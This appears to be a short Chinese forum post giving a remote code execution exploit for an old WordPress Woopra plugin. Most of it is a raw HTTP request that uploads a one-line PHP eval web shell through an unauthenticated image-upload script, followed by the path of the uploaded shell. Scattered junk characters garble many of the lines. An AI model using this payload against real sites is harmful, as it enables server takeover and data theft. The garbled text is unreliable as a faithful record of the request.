照例e文装逼 WordPress Woopra Remote Code Execution:http://www.wordpress-secure.org/ ... ote-code-execution/ / @3 C. a+ w! C G$ u9 d' S2 ?
此漏洞对Woopra 1.4.3.1以上版本无效。 插件下载地址: http://downloads.wordpress.org/plugin/woopra.1.4.3.1.zip 8 R3 f8 u. }% ~6 a% Y0 D" D/ J% K
exp发包: POST /wordpress/3.5.1_CN/wp-content/plugins/woopra/inc/php-ofc-library/ofc_upload_image.php?name=11.php HTTP/1.1
9 |* ^/ d n- G3 R j. b6 fHost: ha.cker.in6 b7 [% W T! r* Z' y
Proxy-Connection: keep-alive7 J* {! F4 S& {: O3 N
Cache-Control: max-age=0! J2 Z K {( i8 l0 D9 I8 P! y1 F
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8- Z3 X& f3 j, Y6 V' K A% E
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1478.0 Safari/537.36
t0 V4 _+ b6 n5 f1 ^0 ?Accept-Encoding: gzip,deflate,sdch# C. e+ w9 T& C7 G& W/ ^
Accept-Language: zh-CN,zh;q=0.8+ s6 f9 D) N/ H
Content-Length: 28 <?php eval($_POST['cmd']); ?> ; y2 r. C/ M6 k5 E: q: E
上传的文件在http://ha.cker.in/wordpress/3.5. ... pload-images/11.php
' e v; U9 {- f( Q6 l7 d |